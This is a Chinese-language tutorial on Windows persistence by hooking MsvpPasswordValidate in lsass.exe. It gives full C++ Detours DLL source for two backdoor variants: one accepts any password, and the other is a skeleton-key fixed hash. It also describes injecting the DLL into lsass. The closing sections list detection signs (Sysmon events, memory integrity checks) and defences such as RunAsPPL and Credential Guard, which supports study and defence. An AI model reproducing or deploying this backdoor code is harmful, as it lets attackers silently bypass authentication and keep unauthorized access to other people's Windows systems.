Windows MsvpPasswordValidate实现权限维持
字数 890 2025-08-06 08:35:32
Windows权限维持技术:利用MsvpPasswordValidate实现后门
概述
本文讲解如何通过Hook Windows系统中的MsvpPasswordValidate函数(位于NtlmShared.dll,属于MSV1_0认证包)实现权限维持。该技术允许已经取得SYSTEM权限的攻击者在系统上建立持久性后门:完全绕过密码验证,或设置一个"万能"密码hash用于登录。需要注意的是,该Hook只影响经由MSV1_0/NTLM路径的密码校验(本地账户登录、NTLM网络认证);Kerberos认证一般不经过此函数,不受影响。
技术原理
MsvpPasswordValidate是Windows系统中位于NtlmShared.dll中的一个关键内部函数,负责验证用户密码。它是未公开文档的导出函数,参数和行为可能随Windows版本变化,使用前应在目标版本上验证其签名。通过Hook此函数,我们可以:
- 完全绕过密码验证(直接返回TRUE;注意此时UserFlags、UserSessionKey等指针参数不会被填写,依赖会话密钥的NTLM网络登录可能因此异常)
- 设置特定密码hash作为万能密码
- 记录用户登录凭证
准备工作
所需工具
- Detours库:Microsoft提供的二进制代码插桩(函数Hook)库
- 下载地址:Microsoft Research官网
- 编译方法:在Visual Studio开发者命令行中运行nmake,编译产物中的detours.lib与detours.h即为所需;注意lib与DLL的位数(x86/x64)必须与目标lsass.exe一致
- DLL注入工具:用于将DLL注入lsass.exe进程。注意Process Explorer只能查看进程和已加载模块,本身不提供注入功能;注入需要SYSTEM权限/SeDebugPrivilege,且在启用LSA保护(RunAsPPL)或Credential Guard的系统上会被阻止
实现步骤
1. 定义函数类型
// Signature of NtlmShared!MsvpPasswordValidate (undocumented export), as
// resolved at runtime with GetProcAddress. Parameter names follow the
// hook implementation below.
using pMsvpPasswordValidate = BOOLEAN(WINAPI*)(
    BOOLEAN,                    // UasCompatibilityRequired
    NETLOGON_LOGON_INFO_CLASS,  // LogonLevel
    PVOID,                      // LogonInformation
    void*,                      // Passwords
    PULONG,                     // UserFlags
    PUSER_SESSION_KEY,          // UserSessionKey
    PVOID);                     // LmSessionKey
2. DLL主函数
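// DLL entry point. Installs the detour when the DLL is mapped and removes
// it again on an explicit unload.
//
// hModule is unused. Returns FALSE from DLL_PROCESS_ATTACH when the hook
// could not be installed, which makes the loader unload the DLL at once.
//
// Fix vs. the original: the hook is no longer detached while the process
// is terminating (lpReserved != NULL). At that point other threads are
// already gone and a Detours transaction is both pointless and unsafe; the
// loader also ignores the return value of DLL_PROCESS_DETACH.
//
// NOTE(review): InstallHook calls LoadLibrary and runs a Detours
// transaction while the loader lock is held. The DllMain contract does not
// permit LoadLibrary there and a deadlock is possible.
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        return InstallHook() ? TRUE : FALSE;
    case DLL_PROCESS_DETACH:
        // lpReserved == NULL means FreeLibrary: restore the original bytes.
        if (lpReserved == nullptr) {
            (void)UninstallHook();
        }
        return TRUE;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}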
3. 安装Hook
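// Resolves NtlmShared!MsvpPasswordValidate and redirects it to
// HookMSVPPValidate inside one Detours transaction.
//
// Returns true only when the detour was committed. On any failure the
// reason is appended to the trace file and false is returned (the original
// reported true even when DetourTransactionCommit failed).
//
// Side effects: appends progress lines to a hard-coded file, raises the
// reference count of NtlmShared.dll (never released -- the hook target has
// to stay mapped), and sets the global MsvpPasswordValidate, which Detours
// updates to point at the trampoline for the original function.
//
// NOTE(review): this runs from DllMain with the loader lock held.
// LoadLibrary from DllMain is explicitly unsupported and can deadlock.
// The hard-coded trace path is a plain-text artifact on disk and an
// obvious indicator for defenders.
bool InstallHook() {
    std::wofstream credentialFile;
    credentialFile.open("D:\\111.txt", std::fstream::in | std::fstream::out | std::fstream::app);

    HMODULE ntlmModule = LoadLibrary(L"NtlmShared.dll");
    if (ntlmModule == nullptr) {
        credentialFile << L"Domain: " << L"load error" << std::endl;
        return false;
    }

    MsvpPasswordValidate = (pMsvpPasswordValidate)GetProcAddress(ntlmModule, "MsvpPasswordValidate");
    // Fix: streaming a function pointer prints it as bool ("1"); cast to
    // an object pointer so the actual address is logged.
    credentialFile << L"Domain: " << L"MsvpPasswordValidate address: "
                   << reinterpret_cast<const void*>(MsvpPasswordValidate) << std::endl;
    if (MsvpPasswordValidate == nullptr) {
        credentialFile << L"Domain: " << L"GetProcAddress error" << std::endl;
        return false;
    }

    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    // Detours rewrites MsvpPasswordValidate to the trampoline on commit.
    LONG detourAttachResult = DetourAttach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
    if (detourAttachResult != NO_ERROR) {
        credentialFile << L"Domain: " << L"DetourAttach error - " << detourAttachResult << std::endl;
        DetourTransactionAbort();
        return false;
    }

    LONG code = DetourTransactionCommit();
    if (code != NO_ERROR) {
        credentialFile << L"Domain: " << L"Error" << std::endl;
    }
    else {
        credentialFile << L"Domain: " << L"true" << std::endl;
    }
    credentialFile.close();
    // A failed commit means nothing was patched; report that honestly.
    return code == NO_ERROR;
}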
4. Hook函数实现
方案1:完全绕过密码验证
// Variant 1: unconditional accept. Every argument is ignored, and the
// pointer parameters (UserFlags, UserSessionKey, LmSessionKey) are left
// untouched -- whatever the caller already had there is what it gets back.
BOOLEAN HookMSVPPValidate(BOOLEAN UasCompatibilityRequired,
                          NETLOGON_LOGON_INFO_CLASS LogonLevel,
                          PVOID LogonInformation,
                          void* Passwords,
                          PULONG UserFlags,
                          PUSER_SESSION_KEY UserSessionKey,
                          PVOID LmSessionKey) {
    (void)UasCompatibilityRequired;
    (void)LogonLevel;
    (void)LogonInformation;
    (void)Passwords;
    (void)UserFlags;
    (void)UserSessionKey;
    (void)LmSessionKey;
    const BOOLEAN accepted = TRUE;
    return accepted;
}
方案2:设置特定密码hash
// Variant 2: "skeleton key". The genuine validator runs first; only if it
// rejects the logon is the supplied password material replaced with a
// fixed hash and the validator run a second time.
//
// Returns the result of the original MsvpPasswordValidate on whichever
// pass accepted. The global MsvpPasswordValidate points at the Detours
// trampoline after InstallHook, so these calls do not recurse into this hook.
BOOLEAN HookMSVPPValidate(BOOLEAN UasCompatibilityRequired,
                          NETLOGON_LOGON_INFO_CLASS LogonLevel,
                          PVOID LogonInformation,
                          void* Passwords,
                          PULONG UserFlags,
                          PUSER_SESSION_KEY UserSessionKey,
                          PVOID LmSessionKey) {
    // Unused: nothing below reads logonIdentity.
    NETLOGON_LOGON_IDENTITY_INFO* logonIdentity = (NETLOGON_LOGON_IDENTITY_INFO*)LogonInformation;
    // Pass 1: real validation, so legitimate passwords keep working.
    if (MsvpPasswordValidate(UasCompatibilityRequired, LogonLevel, LogonInformation, Passwords, UserFlags, UserSessionKey, LmSessionKey)) {
        return TRUE;
    }
    else {
        // Pass 2: overwrite the first 16 bytes of the caller's buffer with
        // the fixed hash and validate again.
        // NOTE(review): `pass` must hold at least 16 bytes. With the
        // placeholder left empty this is a zero-length array (ill-formed in
        // standard C++) and the loop below would read past its end.
        const unsigned char pass[] = { /* your hash */ };
        // NOTE(review): assumes the first 16 bytes at `Passwords` are the
        // NT hash for this LogonLevel -- not established here; confirm
        // against the MSV1_0 password structure on the target build. The
        // caller's buffer is modified in place and never restored.
        for (int i = 0; i < 16; i++) {
            ((unsigned char*)Passwords)[i] = pass[i];
        }
        return MsvpPasswordValidate(UasCompatibilityRequired, LogonLevel, LogonInformation, Passwords, UserFlags, UserSessionKey, LmSessionKey);
    }
}
5. 卸载Hook
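// Removes the detour on MsvpPasswordValidate.
//
// Returns true only when the detach transaction was committed. Fixes vs.
// the original: a never-resolved target (InstallHook failed before
// GetProcAddress) no longer reaches DetourDetach with a null pointer, a
// failed DetourDetach aborts the transaction, and the commit result is
// reported instead of being discarded.
bool UninstallHook() {
    if (MsvpPasswordValidate == nullptr) {
        return false;
    }
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    LONG detachResult = DetourDetach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
    if (detachResult != NO_ERROR) {
        DetourTransactionAbort();
        return false;
    }
    return DetourTransactionCommit() == NO_ERROR;
}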
部署方法
- 编译上述代码为DLL文件
- 使用进程注入工具将DLL注入到lsass.exe进程
- 注入成功后,lsass.exe内存中的MsvpPasswordValidate入口即被改写。该修改仅存在于内存中:磁盘上的NtlmShared.dll不变,重启后Hook即失效,因此要真正"维持"权限,还需要一个在每次启动时重新完成注入的机制
检测与防御
检测方法
- 进程分析:检查lsass.exe加载的非微软签名或路径异常的DLL(Process Explorer的DLL视图、`tasklist /m`,或Sysmon Event ID 7镜像加载事件)
- API监控:检测对MsvpPasswordValidate的Hook——对比lsass.exe内存中该函数入口处的字节与磁盘上NtlmShared.dll的原始字节(inline hook会改写函数开头的指令);具备内存完整性扫描能力的EDR通常可以发现此类修改
- 注入行为监控:关注针对lsass.exe的远程线程创建与带写入/执行权限的句柄打开(例如Sysmon Event ID 8与Event ID 10)
- 日志分析:检查异常登录事件(如安全日志4624中来源、时段或账户异常的NTLM登录);此外本文示例会向硬编码路径写入日志文件,此类文件本身也是可用的IOC
防御措施
- 限制对lsass.exe的进程注入:启用LSA保护(RunAsPPL,使lsass作为受保护进程运行)并部署Credential Guard,未签名的DLL将无法加载进lsass;同时最小化拥有SeDebugPrivilege的账户
- 启用Windows Defender攻击面减少(ASR)规则,特别是"阻止从Windows本地安全机构子系统(lsass.exe)窃取凭据"规则,可阻断大多数用户态对lsass的访问
- 定期检查系统关键DLL的完整性;但注意本文技术只修改lsass内存中的代码,磁盘上的NtlmShared.dll保持不变,单纯的文件完整性校验无法发现此类Hook,需配合内存扫描
- 监控对NtlmShared.dll的替换或修改(针对落盘持久化的变种),并监控针对lsass.exe的内存写入行为
完整代码
#pragma once
#define SECURITY_WIN32
#define WIN32_LEAN_AND_MEAN
#define DEBUG_BUILD
#include <windows.h>
#include <SubAuth.h>
#include <iostream>
#include <fstream>
#include <string>
#include "detours.h"
#pragma comment (lib,"detours.lib")
// Signature of NtlmShared!MsvpPasswordValidate (undocumented export), as
// resolved at runtime with GetProcAddress. Parameter names follow the
// hook implementation below.
using pMsvpPasswordValidate = BOOLEAN(WINAPI*)(
    BOOLEAN,                    // UasCompatibilityRequired
    NETLOGON_LOGON_INFO_CLASS,  // LogonLevel
    PVOID,                      // LogonInformation
    void*,                      // Passwords
    PULONG,                     // UserFlags
    PUSER_SESSION_KEY,          // UserSessionKey
    PVOID);                     // LmSessionKey

// Resolved function pointer; nullptr until InstallHook succeeds. After
// DetourAttach it refers to the Detours trampoline, i.e. calling through it
// reaches the original implementation, not the hook.
pMsvpPasswordValidate MsvpPasswordValidate{nullptr};
// Unconditional accept. Every argument is ignored, and the pointer
// parameters (UserFlags, UserSessionKey, LmSessionKey) are left untouched --
// whatever the caller already had there is what it gets back.
BOOLEAN HookMSVPPValidate(BOOLEAN UasCompatibilityRequired,
                          NETLOGON_LOGON_INFO_CLASS LogonLevel,
                          PVOID LogonInformation,
                          void* Passwords,
                          PULONG UserFlags,
                          PUSER_SESSION_KEY UserSessionKey,
                          PVOID LmSessionKey) {
    (void)UasCompatibilityRequired;
    (void)LogonLevel;
    (void)LogonInformation;
    (void)Passwords;
    (void)UserFlags;
    (void)UserSessionKey;
    (void)LmSessionKey;
    const BOOLEAN accepted = TRUE;
    return accepted;
}
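// Resolves NtlmShared!MsvpPasswordValidate and redirects it to
// HookMSVPPValidate inside one Detours transaction.
//
// Returns true only when the detour was committed. On any failure the
// reason is appended to the trace file and false is returned (the original
// reported true even when DetourTransactionCommit failed).
//
// Side effects: appends progress lines to a hard-coded file, raises the
// reference count of NtlmShared.dll (never released -- the hook target has
// to stay mapped), and sets the global MsvpPasswordValidate, which Detours
// updates to point at the trampoline for the original function.
//
// NOTE(review): this runs from DllMain with the loader lock held.
// LoadLibrary from DllMain is explicitly unsupported and can deadlock.
// The hard-coded trace path is a plain-text artifact on disk and an
// obvious indicator for defenders.
bool InstallHook() {
    std::wofstream credentialFile;
    credentialFile.open("D:\\111.txt", std::fstream::in | std::fstream::out | std::fstream::app);

    HMODULE ntlmModule = LoadLibrary(L"NtlmShared.dll");
    if (ntlmModule == nullptr) {
        credentialFile << L"Domain: " << L"load error" << std::endl;
        return false;
    }

    MsvpPasswordValidate = (pMsvpPasswordValidate)GetProcAddress(ntlmModule, "MsvpPasswordValidate");
    // Fix: streaming a function pointer prints it as bool ("1"); cast to
    // an object pointer so the actual address is logged.
    credentialFile << L"Domain: " << L"MsvpPasswordValidate address: "
                   << reinterpret_cast<const void*>(MsvpPasswordValidate) << std::endl;
    if (MsvpPasswordValidate == nullptr) {
        credentialFile << L"Domain: " << L"GetProcAddress error" << std::endl;
        return false;
    }

    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    // Detours rewrites MsvpPasswordValidate to the trampoline on commit.
    LONG detourAttachResult = DetourAttach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
    if (detourAttachResult != NO_ERROR) {
        credentialFile << L"Domain: " << L"DetourAttach error - " << detourAttachResult << std::endl;
        DetourTransactionAbort();
        return false;
    }

    LONG code = DetourTransactionCommit();
    if (code != NO_ERROR) {
        credentialFile << L"Domain: " << L"Error" << std::endl;
    }
    else {
        credentialFile << L"Domain: " << L"true" << std::endl;
    }
    credentialFile.close();
    // A failed commit means nothing was patched; report that honestly.
    return code == NO_ERROR;
}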
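// Removes the detour on MsvpPasswordValidate.
//
// Returns true only when the detach transaction was committed. Fixes vs.
// the original: a never-resolved target (InstallHook failed before
// GetProcAddress) no longer reaches DetourDetach with a null pointer, a
// failed DetourDetach aborts the transaction, and the commit result is
// reported instead of being discarded.
bool UninstallHook() {
    if (MsvpPasswordValidate == nullptr) {
        return false;
    }
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    LONG detachResult = DetourDetach(&(PVOID&)MsvpPasswordValidate, HookMSVPPValidate);
    if (detachResult != NO_ERROR) {
        DetourTransactionAbort();
        return false;
    }
    return DetourTransactionCommit() == NO_ERROR;
}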
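// DLL entry point. Installs the detour when the DLL is mapped and removes
// it again on an explicit unload.
//
// hModule is unused. Returns FALSE from DLL_PROCESS_ATTACH when the hook
// could not be installed, which makes the loader unload the DLL at once.
//
// Fix vs. the original: the hook is no longer detached while the process
// is terminating (lpReserved != NULL). At that point other threads are
// already gone and a Detours transaction is both pointless and unsafe; the
// loader also ignores the return value of DLL_PROCESS_DETACH.
//
// NOTE(review): InstallHook calls LoadLibrary and runs a Detours
// transaction while the loader lock is held. The DllMain contract does not
// permit LoadLibrary there and a deadlock is possible.
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        return InstallHook() ? TRUE : FALSE;
    case DLL_PROCESS_DETACH:
        // lpReserved == NULL means FreeLibrary: restore the original bytes.
        if (lpReserved == nullptr) {
            (void)UninstallHook();
        }
        return TRUE;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}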
总结
通过Hook MsvpPasswordValidate实现权限维持是一种隐蔽且有效的后门技术,在MITRE ATT&CK中属于"修改认证过程"(T1556)一类。安全人员应了解此类技术原理及其检测特征(lsass.exe中的异常模块、函数入口字节被改写、异常的NTLM登录),以便更好地防御相关攻击。在实际应用中,此类技术仅限用于合法授权测试,未经授权使用可能违反法律。